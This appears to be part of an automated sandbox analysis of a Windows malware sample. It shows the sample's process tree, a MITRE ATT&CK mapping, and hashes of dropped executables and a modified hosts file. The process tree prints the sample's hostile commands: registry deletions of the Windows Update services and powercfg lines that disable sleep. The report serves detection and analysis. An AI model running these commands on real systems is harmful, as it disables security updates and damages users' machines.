- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1372
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:3228
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:3872
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:4408
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:4764
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:4732
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4932
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:4316
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:420
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:316
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:1052

C:\Users\Admin\AppData\Roaming\XgKocxNybk\svcupdater.exe
C:\Users\Admin\AppData\Roaming\XgKocxNybk\svcupdater.exe
1⤵
- Executes dropped EXE
PID:3668

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
fef768785abb54441e2838d04126b0d0

SHA1
08f17e3c5d94d6685981f1614c132d37a5a80267

SHA256
73fd2082bcbdcca2ab5585393527e9ee145bbd723b28d3b703ea94d6f75d6811

SHA512
05d44800ff48b86bcf81e03781eab2e4d1f64a85ec83e1d5c40a2fe9437238c772bbc4069bea81ce492cd9138aed4d1746dcc63f577e5b68b7e6de5d1f95c917

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f14c875371cece64ec3f57c74fea9d5f

SHA1
5670623ad2f84816cbc2628ed4462e10c2daf54c

SHA256
567c4c70fd60e9fbbb93ccbcaed619574c39637f95f7a7b83551ec9030b9afec

SHA512
44ac95231b193a31baa01f9045569b074c9353156bd23c7905fe8f9575c76f503aa6387f6e6313bfc4cd6cc29818cad7d76bd17b48312d2d30f84c6ad6ef4566

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
83ac0425a19e69f9d98b3b7a67c25982

SHA1
792a62ff6871072ce2c1c14e40e43668f049cd91

SHA256
4588653fdd876e9b5dec90659aae4e0e2996429ca3e039d518cbe42f41d1b946

SHA512
3ce791afe9f04cfba016914a56461c6076d379e3d9e4bd8abe0c331f3841ddbc826793fdae951ab737ece91adeaa952586476a7ef64f7c3c2b1e190d1afc6419

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4500b7793d3e4115f08ae457fbcb6bc8

SHA1
906370947d18da2f9c7a0ebc2895a75f9d569335

SHA256
7ace4243e64ba3f654c03f8f8a30879f3555cf8b324d79ffb44823289967413b

SHA512
9c130f7cf6235b307a67017be864d2991196c4406724843db934b8b9d999c5d7acaf0b69d9a3d44ebca30d77fd6f3f116cdc39eb2a78103b2896e52b68daadea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4500b7793d3e4115f08ae457fbcb6bc8

SHA1
906370947d18da2f9c7a0ebc2895a75f9d569335

SHA256
7ace4243e64ba3f654c03f8f8a30879f3555cf8b324d79ffb44823289967413b

SHA512
9c130f7cf6235b307a67017be864d2991196c4406724843db934b8b9d999c5d7acaf0b69d9a3d44ebca30d77fd6f3f116cdc39eb2a78103b2896e52b68daadea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
912B

MD5
9b96b2c76c1a4b55ac2328e7a465a6c0

SHA1
6e8d00b36adeb7c0358a95facb45df370195b5ed

SHA256
e16dfeeeadb26d119a243c7555fe1e0b08dae87b79ec50daa146ade9a03e9689

SHA512
6d3dd9f03bd19ee7bdcde37ddec60fb8c9b3213210527a4f722563f3c7fa70f37dd960801a7ba7ffc5bb962938127b5e83d135b39b8c53191af30a58c5980e08

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1f46c9f53cb61349cb44943e2f37d4b5

SHA1
27959e66a1bbda55506cc47250364f0d533abfac

SHA256
7567487119ee67aa8356efff619b1bda1e1008de84c915118c2e926b74ee910a

SHA512
7820520a4670df3709a1abf91bf5ee8b82e9305773482e310942da497ff8e1a4263d765da39aed499aa470ffbc92f66d8c4a3c376261fbf8c4345aa2fd23a593

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4930804b8b1c0fdb2d7130064fac7400

SHA1
9d31686d94048ae2380ce68d83f26aa8106643cf

SHA256
fcd9c0d4973fdcad0612b6ff6d0f34e980d2a7d41e5f3c384ca08e76937e338b

SHA512
b58985cd156bc34a46d2ae54214d0fdd0324bcb3fb12a2ba9ca26e9226defa624b6432fb993c20ffbd36c41261e4751c4f69f4392bb97f68fa5461b3d936e403

Download Submit
C:\Users\Admin\AppData\Local\Temp\2au8qdErXb.exe

Filesize
3.6MB

MD5
072f12e05c716143d2961a34b5de6069

SHA1
634fa0f7daee8d7b1952e1c62e10a958e6ae2440

SHA256
49b958ca0ec867228d88d9fe3d1c27e6db8155bdee371fe3cebfdfa159c7edaa

SHA512
1feb2cea96e007f96ea0caf30e8dd6136ac07fec4e5a58614e5ef020d2f988fd33bc973051aa22aa7254fef55b2339da8a2d5202dee18f53054f843b90c5eb22

Download Submit
C:\Users\Admin\AppData\Local\Temp\2au8qdErXb.exe

Filesize
3.6MB

MD5
072f12e05c716143d2961a34b5de6069

SHA1
634fa0f7daee8d7b1952e1c62e10a958e6ae2440

SHA256
49b958ca0ec867228d88d9fe3d1c27e6db8155bdee371fe3cebfdfa159c7edaa

SHA512
1feb2cea96e007f96ea0caf30e8dd6136ac07fec4e5a58614e5ef020d2f988fd33bc973051aa22aa7254fef55b2339da8a2d5202dee18f53054f843b90c5eb22

Download Submit
C:\Users\Admin\AppData\Local\Temp\LicCheck.exe

Filesize
3.6MB

MD5
39c61e19f034b7dfac758f989f00aee6

SHA1
3aa01c665f211bfcb12ae57bf137db46e5feac05

SHA256
7111b624696fc883dbeb22cb78e39810b449bd60d37a836e04cdb828ae448679

SHA512
e5144dbcbf01e0ec57c188238a62cf9f27b4ae460013ffc5f5de2948d0375a393e0f6bb088b2a8bc035ac0c7485cad1f089736157e0b885323fddb665d65ccd8

Download Submit
C:\Users\Admin\AppData\Local\Temp\LicCheck.exe

Filesize
3.6MB

MD5
39c61e19f034b7dfac758f989f00aee6

SHA1
3aa01c665f211bfcb12ae57bf137db46e5feac05

SHA256
7111b624696fc883dbeb22cb78e39810b449bd60d37a836e04cdb828ae448679

SHA512
e5144dbcbf01e0ec57c188238a62cf9f27b4ae460013ffc5f5de2948d0375a393e0f6bb088b2a8bc035ac0c7485cad1f089736157e0b885323fddb665d65ccd8

Download Submit
C:\Users\Admin\AppData\Local\Temp\SA07cEnYTb.exe

Filesize
8KB

MD5
4591a16a7ff313b757785abb4fb6a2ca

SHA1
c21b0d6bde49bc8633a689c59c331ef5b3692f0e

SHA256
b8a7cd7ead9d76e1760b3865a564adf4e95cee3aa50484a07c0e5539ca61c7b2

SHA512
e5513c301b324f5e9e9e2ac0241ea7eef380c022e7f9db21dca36c9e625f4a4d25cc8055a5863f42ba394b8c887fac94184e7ec8bf45bdaa6b9517674fbb9186

Download Submit
C:\Users\Admin\AppData\Local\Temp\SA07cEnYTb.exe

Filesize
8KB

MD5
4591a16a7ff313b757785abb4fb6a2ca

SHA1
c21b0d6bde49bc8633a689c59c331ef5b3692f0e

SHA256
b8a7cd7ead9d76e1760b3865a564adf4e95cee3aa50484a07c0e5539ca61c7b2

SHA512
e5513c301b324f5e9e9e2ac0241ea7eef380c022e7f9db21dca36c9e625f4a4d25cc8055a5863f42ba394b8c887fac94184e7ec8bf45bdaa6b9517674fbb9186

Download Submit
C:\Users\Admin\AppData\Roaming\LMSCheck.exe

Filesize
4.4MB

MD5
15dd239ddf40ad2e024cab2e7d6d1102

SHA1
0a986aca92cc8b3ff65bb0ecfafadbc5f8ebb4c2

SHA256
71687f2ba97ca66b38fb0bfa10608bb08e578a1dfb9113c74363368f48ecb4a7

SHA512
f9d74fca6616a2aa07d27e2e8710f2ee33f0c1c4e3d6c4f220321e488c82a97084f23e4fa07e918143edb3e6643c0dec680330b62a1581ca5154026379e679c3

Download Submit
C:\Users\Admin\AppData\Roaming\LMSCheck.exe

Filesize
4.4MB

MD5
15dd239ddf40ad2e024cab2e7d6d1102

SHA1
0a986aca92cc8b3ff65bb0ecfafadbc5f8ebb4c2

SHA256
71687f2ba97ca66b38fb0bfa10608bb08e578a1dfb9113c74363368f48ecb4a7

SHA512
f9d74fca6616a2aa07d27e2e8710f2ee33f0c1c4e3d6c4f220321e488c82a97084f23e4fa07e918143edb3e6643c0dec680330b62a1581ca5154026379e679c3

Download Submit
C:\Users\Admin\AppData\Roaming\SysHost.exe

Filesize
8KB

MD5
4591a16a7ff313b757785abb4fb6a2ca

SHA1
c21b0d6bde49bc8633a689c59c331ef5b3692f0e

SHA256
b8a7cd7ead9d76e1760b3865a564adf4e95cee3aa50484a07c0e5539ca61c7b2

SHA512
e5513c301b324f5e9e9e2ac0241ea7eef380c022e7f9db21dca36c9e625f4a4d25cc8055a5863f42ba394b8c887fac94184e7ec8bf45bdaa6b9517674fbb9186

Download Submit
C:\Users\Admin\AppData\Roaming\SysHost.exe

Filesize
8KB

MD5
4591a16a7ff313b757785abb4fb6a2ca

SHA1
c21b0d6bde49bc8633a689c59c331ef5b3692f0e

SHA256
b8a7cd7ead9d76e1760b3865a564adf4e95cee3aa50484a07c0e5539ca61c7b2

SHA512
e5513c301b324f5e9e9e2ac0241ea7eef380c022e7f9db21dca36c9e625f4a4d25cc8055a5863f42ba394b8c887fac94184e7ec8bf45bdaa6b9517674fbb9186

Download Submit
C:\Users\Admin\AppData\Roaming\XgKocxNybk\svcupdater.exe

Filesize
8KB

MD5
4591a16a7ff313b757785abb4fb6a2ca

SHA1
c21b0d6bde49bc8633a689c59c331ef5b3692f0e

SHA256
b8a7cd7ead9d76e1760b3865a564adf4e95cee3aa50484a07c0e5539ca61c7b2

SHA512
e5513c301b324f5e9e9e2ac0241ea7eef380c022e7f9db21dca36c9e625f4a4d25cc8055a5863f42ba394b8c887fac94184e7ec8bf45bdaa6b9517674fbb9186

Download Submit
C:\Users\Admin\AppData\Roaming\XgKocxNybk\svcupdater.exe

Filesize
8KB

MD5
4591a16a7ff313b757785abb4fb6a2ca

SHA1
c21b0d6bde49bc8633a689c59c331ef5b3692f0e

SHA256
b8a7cd7ead9d76e1760b3865a564adf4e95cee3aa50484a07c0e5539ca61c7b2

SHA512
e5513c301b324f5e9e9e2ac0241ea7eef380c022e7f9db21dca36c9e625f4a4d25cc8055a5863f42ba394b8c887fac94184e7ec8bf45bdaa6b9517674fbb9186

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
880B

MD5
521e3a844ccb37986ff2c4ce71b69123

SHA1
3c6d2ce5badcdb9b2c5fb8ff29da660e73fc2aa4

SHA256
b369bcbd8412679ec996896956a892474e36757fb9c4cfdbf5f79bb0b2685f4f

SHA512
a02e1d840a4e2a21ebb136c01f08375952c4364654b461dc207f9c3303280e0a154b4cabd9c550dc17dc6c3e144a6877f0004d7a9c492190523fd908c48bb485

Download Submit
memory/2412-120-0x0000000000620000-0x000000000064E000-memory.dmp

Filesize
184KB

Download
memory/4808-129-0x00000145E2290000-0x00000145E2306000-memory.dmp

Filesize
472KB

Download
memory/4808-126-0x00000145C9F40000-0x00000145C9F62000-memory.dmp

Filesize
136KB

Download
memory/4836-202-0x0000000000750000-0x0000000000758000-memory.dmp

Filesize
32KB

Download